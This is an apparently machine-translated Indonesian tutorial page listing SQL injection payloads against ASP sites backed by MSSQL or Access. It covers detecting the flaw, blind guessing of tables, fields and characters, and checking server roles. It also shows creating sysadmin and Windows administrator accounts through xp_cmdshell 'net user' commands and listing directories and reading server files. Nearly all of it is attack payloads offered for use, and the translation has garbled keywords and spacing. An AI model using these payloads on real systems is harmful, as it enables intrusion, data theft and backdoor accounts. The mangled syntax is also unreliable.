Beranda>Tutorial Pemrograman Jaringan>tutorial ASP

Pemahaman komprehensif tentang keterampilan injeksi ASP

Penulis:Eve Cole Waktu Pembaruan:2025-06-10 22:16:01

Salinan kode adalah sebagai berikut:

1. Tentukan apakah ada suntikan

; dan1 = 1

; dan1 = 2

2. Penilaian awal tentang apakah itu mssql

; anduser> 0

3. Parameter injeksi adalah karakter

'dan [kondisi kueri] dan' '='

4. Tidak ada parameter penyaringan selama pencarian

'dan [kondisi kueri] dan'%25 '='

5. Sistem Database Hakim

; dan (SelectCount (*) FromsysObjects)> 0MSSQL

; dan (SelectCount (*) FrommsysObjects)> 0Access

6. Tebak database

; dan (selectCount (*) dari [nama basis data])> 0

7. Tebak Lapangan

; dan (SelectCount (nama bidang) dari nama basis data)> 0

8. Tebak panjang rekor di lapangan

; dan (selecttop1len (nama bidang) dari nama basis data)> 0

9. (1) Tebak nilai ASCII dari bidang (akses)

; dan (selecttop1asc (mid (nama bidang, 1, 1)) dari nama basis data)> 0

(2) Tebak nilai ASCII bidang (MSSQL)

; dan (SELECTTOP1UNICODE (Substring (Nama Bidang, 1, 1)) dari nama basis data)> 0

10. Struktur Izin Uji (MSSQL)

; and1 = (selectiS_srvrolemember ('sysadmin'));-

; and1 = (selectiS_srvrolemember ('serveradmin'));-

; and1 = (selectiS_srvrolemember ('setupadmin'));-

; and1 = (selectiS_srvrolemember ('SecurityAdmin'));-

; and1 = (selection_srvrolemember ('diskadmin'));-

; and1 = (selectiS_srvrolemember ('bulkadmin'));-

; and1 = (selectiS_member ('db_owner'));-

11. Tambahkan Akun MSSQL dan Sistem

; execmaster.dbo.sp_addloginusername;-

; execmaster.dbo.sp_passwordnull, nama pengguna, kata sandi;-

; execmaster.dbo.sp_addsrvrolemembersysadminusername;-

; execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/Times: semua/kata sandi: ya/kata sandi: ya/aktif: ya/add ';-

; execmaster.dbo.xp_cmdshell'netuserusernamepassword/add ';-

; execmaster.dbo.xp_cmdshell'NetLocalGroupAdMinistratorSusername/add ';--

12. (1) Transfer direktori

; CreateTableDirs (PathsVarchar (100), Idint)

; InsertDirsexecmaster.dbo.xp_dirtree'c:/'

; dan (selecttop1pathsfromdirs)> 0

; dan (selecttop1pathsfromdirswherePathsnotin ('jalur yang diperoleh dari langkah sebelumnya')>))

(2) melintasi direktori

; CreateTableTemp (IDNVARCHAR (255), NUM1NVARCHAR (255), NUM2NVARCHAR (255), NUM3NVARCHAR (255));-

; InsertTempExecmaster.dbo.xp_availablemedia; -Get semua drive saat ini

; insertIntotemp (id) execmaster.dbo.xp_subdirs'c:/';-Dapatkan daftar subdirektori

; insertIntotemp (id, num1) execmaster.dbo.xp_dirtree'c:/';-Dapatkan struktur pohon direktori dari semua subdirektori

; insertIntotemp (id) execmaster.dbo.xp_cmdshell'typec: /web/index.asp ';-Lihat konten file file

Artikel Terkait